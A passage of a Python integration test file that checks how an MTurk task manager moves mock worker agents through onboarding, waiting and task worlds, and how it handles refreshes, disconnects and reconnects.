assert test_agent.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
wait_for_state_time(2, mturk_manager)
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_ONBOARDING)
test_agent.send_message('Hello2', dummy)
wait_for_state_time(4, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
last_time = time.time()
while message_num == 2:
# Wait for manager to catch up
time.sleep(0.2)
assert time.time() - last_time < 10, \
'Timed out wating for server to acknowledge alive'
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent.send_message('Hello3', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert mturk_manager_assign.is_in_task(), 'Manager\'s copy of agent is ' \
'not aware that they are in a task, even though the state is'
assert len(assign_state.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state.messages))
test_agent.send_message('Hello4', dummy)
test_agent.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert mturk_manager_assign.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon failure of ' \
'onboarding, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert message_num == 4, 'Not all messages were successfully processed'
completed_threads[SOLO_ONBOARDING_TEST] = True
def test_solo_no_onboarding(opt, server_url):
"""Ensures a solo agent with no onboarding moves directly to a task world
and is able to complete the task and be marked as completed
"""
global completed_threads
print('{} Starting'.format(SOLO_NO_ONBOARDING_TEST))
opt['task'] = SOLO_NO_ONBOARDING_TEST
hit_id = FAKE_HIT_ID.format(SOLO_NO_ONBOARDING_TEST)
assign_id = FAKE_ASSIGNMENT_ID.format(SOLO_NO_ONBOARDING_TEST, 1)
worker_id = FAKE_WORKER_ID.format(SOLO_NO_ONBOARDING_TEST, 1)
last_command = None
message_num = 0
expected_messages = [
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids = [mturk_agent_id]
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent = MockAgent(opt, hit_id, assign_id, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager, AssignState.STATUS_IN_TASK)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id]
assign_state = mturk_manager_assign.state
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert len(assign_state.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state.messages))
test_agent.send_message('Hello2', dummy)
wait_for_state_time(3, mturk_manager)
test_agent.always_beat = False
check_status(assign_state.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert len(assign_state.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert message_num == 2, 'Not all messages were successfully processed'
completed_threads[SOLO_NO_ONBOARDING_TEST] = True
def test_solo_refresh_in_middle(opt, server_url):
"""Tests refreshing in the middle of a solo task to make sure state is
properly restored
"""
global completed_threads
print('{} Starting'.format(SOLO_REFRESH_TEST))
opt['task'] = SOLO_REFRESH_TEST
hit_id = FAKE_HIT_ID.format(SOLO_REFRESH_TEST)
assign_id = FAKE_ASSIGNMENT_ID.format(SOLO_REFRESH_TEST, 1)
worker_id = FAKE_WORKER_ID.format(SOLO_REFRESH_TEST, 1)
last_command = None
message_num = 0
expected_messages = [
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent = MockAgent(opt, hit_id, assign_id, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager, AssignState.STATUS_IN_TASK)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id]
assign_state = mturk_manager_assign.state
# Run through onboarding
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
# Simulate a refresh
test_agent.conversation_id = None
test_agent.send_alive()
last_time = time.time()
while (last_command.data['text'] != data_model.COMMAND_RESTORE_STATE):
# Wait for the restore state command
time.sleep(1)
assert time.time() - last_time < 10, \
'Timed out wating for COMMAND_RESTORE_STATE to arrive'
# Check that the restore state had what we expected
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it back to task world'
assert len(last_command.data['messages']) == 1, \
'State restored with more than the 1 message expected, got {}'.format(
len(last_command.data['messages'])
)
assert last_command.data['messages'][0]['text'] == expected_messages[0], \
'Message sent in restore state packet wasn\'t correct'
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert len(assign_state.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 1'.format(len(assign_state.messages))
test_agent.send_message('Hello2', dummy)
test_agent.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert len(assign_state.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
completed_threads[SOLO_REFRESH_TEST] = True
def test_duo_with_onboarding(opt, server_url):
"""Tests a solo task with onboarding to make sure the task doesn't begin
until both agents are ready to go. Also tests that a third agent is not
able to join after the conversation starts, as the HIT should be expired
"""
global completed_threads
print('{} Starting'.format(DUO_ONBOARDING_TEST))
opt['task'] = DUO_ONBOARDING_TEST
hit_id = FAKE_HIT_ID.format(DUO_ONBOARDING_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_ONBOARDING_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_ONBOARDING_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_ONBOARDING_TEST, 2)
# Repeat worker_id on purpose to test is_sandbox matching of unique workers
worker_id_2 = FAKE_WORKER_ID.format(DUO_ONBOARDING_TEST, 1)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(DUO_ONBOARDING_TEST, 3)
worker_id_3 = FAKE_WORKER_ID.format(DUO_ONBOARDING_TEST, 3)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_3, assign_id_3)
last_command = None
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, True))
world_thread.daemon = True
world_thread.start()
# create and set up the two agents
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_3, task_group_id)
def msg_callback_3(packet):
nonlocal last_command
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
message_handler_3 = \
make_packet_handler(test_agent_3, dummy, dummy, msg_callback_3)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_1.wait_for_alive()
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
check_new_agent_setup(test_agent_2, mturk_manager)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
check_new_agent_setup(test_agent_1, mturk_manager)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
check_new_agent_setup(test_agent_2, mturk_manager)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run agent_1 through onboarding
assert test_agent_1.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_1.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_ONBOARDING)
test_agent_1.send_message('Onboard2', dummy)
wait_for_state_time(2, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Run agent_2 through onboarding
assert test_agent_2.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_2.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_ONBOARDING)
test_agent_2.send_message('Onboard2', dummy)
wait_for_state_time(4, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
wait_for_state_time(2, mturk_manager)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
# Attempt to connect with agent 3
assert not mturk_manager.accepting_workers, \
'Manager shouldn\'t still be accepting workers after a conv started'
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_3.wait_for_alive()
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'HIT was not immediately expired when connected'
# Finish the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[DUO_ONBOARDING_TEST] = True
def test_duo_no_onboarding(opt, server_url):
"""Tests duo task to completion, as well as disconnect in
waiting to ensure the agent is marked disconnected and removed from pool.
It also tests disconnect in transitioning to a world to ensure the other
agent returns to waiting
"""
global completed_threads
print('{} Starting'.format(DUO_NO_ONBOARDING_TEST))
opt['task'] = DUO_NO_ONBOARDING_TEST
opt['count_complete'] = True
hit_id = FAKE_HIT_ID.format(DUO_NO_ONBOARDING_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 2)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 3)
worker_id_3 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 3)
assign_id_4 = FAKE_ASSIGNMENT_ID.format(DUO_NO_ONBOARDING_TEST, 4)
worker_id_4 = FAKE_WORKER_ID.format(DUO_NO_ONBOARDING_TEST, 4)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_3, assign_id_3)
connection_id_4 = '{}_{}'.format(worker_id_4, assign_id_4)
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up an agent to disconnect when paired
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_3, task_group_id)
def msg_callback_3(packet):
nonlocal message_num
nonlocal test_agent_3
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_3.wants_to_send = True
message_handler_3 = make_packet_handler_cant_task(
test_agent_3,
dummy,
dummy,
msg_callback_3
)
test_agent_3.always_beat = True
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_3.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_3, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_3 = \
mturk_manager.mturk_workers[worker_id_3].agents[assign_id_3]
assign_state_3 = mturk_manager_assign_3.state
# Start heartbeats for 3
test_agent_3.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure agent 3 is sitting in a waiting world now
assert test_agent_3.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_3.status, AssignState.STATUS_WAITING)
assert len(mturk_manager.worker_pool) == 1, \
'Worker was not entered into pool'
# create and set up an agent to disconnect when returned to waiting
test_agent_4 = MockAgent(opt, hit_id, assign_id_4,
worker_id_4, task_group_id)
def msg_callback_4(packet):
nonlocal message_num
nonlocal test_agent_4
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_4.wants_to_send = True
message_handler_4 = \
make_packet_handler(test_agent_4, dummy, dummy, msg_callback_4)
test_agent_4.setup_socket(server_url, message_handler_4)
test_agent_4.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_4, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_4 = \
mturk_manager.mturk_workers[worker_id_4].agents[assign_id_4]
assign_state_4 = mturk_manager_assign_4.state
# Start heartbeats for 4
test_agent_4.always_beat = True
test_agent_4.send_heartbeat()
assert len(mturk_manager.worker_pool) == 0, \
'Workers were not removed from pool when assigned to a world'
check_status(assign_state_3.status, AssignState.STATUS_ASSIGNED)
# Wait for the world to give up on waiting
wait_for_state_time(WORLD_START_TIMEOUT + 2.5, mturk_manager)
# Assert that the agent is back in the waiting world
check_status(assign_state_4.status, AssignState.STATUS_WAITING)
assert len(mturk_manager.worker_pool) == 1, \
'Worker was not entered returned to pool'
# Assert that the disconnected agent is marked as so
wait_for_state_time(2, mturk_manager)
check_status(assign_state_3.status, AssignState.STATUS_DISCONNECT)
# Wait for 4 to disconnect as well
test_agent_4.always_beat = False
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
assert len(mturk_manager.worker_pool) == 0, \
'Workers were not removed from pool when disconnected'
check_status(assign_state_4.status, AssignState.STATUS_DISCONNECT)
# create and set up the first successful agent
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[DUO_NO_ONBOARDING_TEST] = True
def test_duo_valid_reconnects(opt, server_url):
"""Tests reconnects during the task which should reload the conversation
state, as well as completing a task after a reconnect.
"""
global completed_threads
print('{} Starting'.format(DUO_VALID_RECONNECT_TEST))
opt['task'] = DUO_VALID_RECONNECT_TEST
hit_id = FAKE_HIT_ID.format(DUO_VALID_RECONNECT_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(DUO_VALID_RECONNECT_TEST, 1)
worker_id_1 = FAKE_WORKER_ID.format(DUO_VALID_RECONNECT_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(DUO_VALID_RECONNECT_TEST, 2)
worker_id_2 = FAKE_WORKER_ID.format(DUO_VALID_RECONNECT_TEST, 2)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_2, assign_id_2)
message_num = 0
refresh_was_valid = False
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up the first agent
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
nonlocal refresh_was_valid
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_RESTORE_STATE:
messages = packet.data['messages']
assert messages[0]['text'] == expected_messages[0], 'first ' \
'message in restore state {} not as expected {}'.format(
messages[0], expected_messages[0]
)
assert messages[1]['text'] == expected_messages[1], 'second ' \
'message in restore state {} not as expected {}'.format(
messages[1], expected_messages[1]
)
assert packet.data['last_command']['text'] == \
data_model.COMMAND_SEND_MESSAGE, 'restore state didn\'t '\
'include command to send a new message'
refresh_was_valid = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
nonlocal refresh_was_valid
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif packet.data['text'] == data_model.COMMAND_RESTORE_STATE:
messages = packet.data['messages']
assert messages[0]['text'] == expected_messages[0], 'first ' \
'message in restore state {} not as expected {}'.format(
messages[0], expected_messages[0]
)
assert messages[1]['text'] == expected_messages[1], 'second ' \
'message in restore state {} not as expected {}'.format(
messages[1], expected_messages[1]
)
assert packet.data['last_command']['text'] == \
data_model.COMMAND_SEND_MESSAGE, 'restore state didn\'t '\
'include command to send a new message'
refresh_was_valid = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
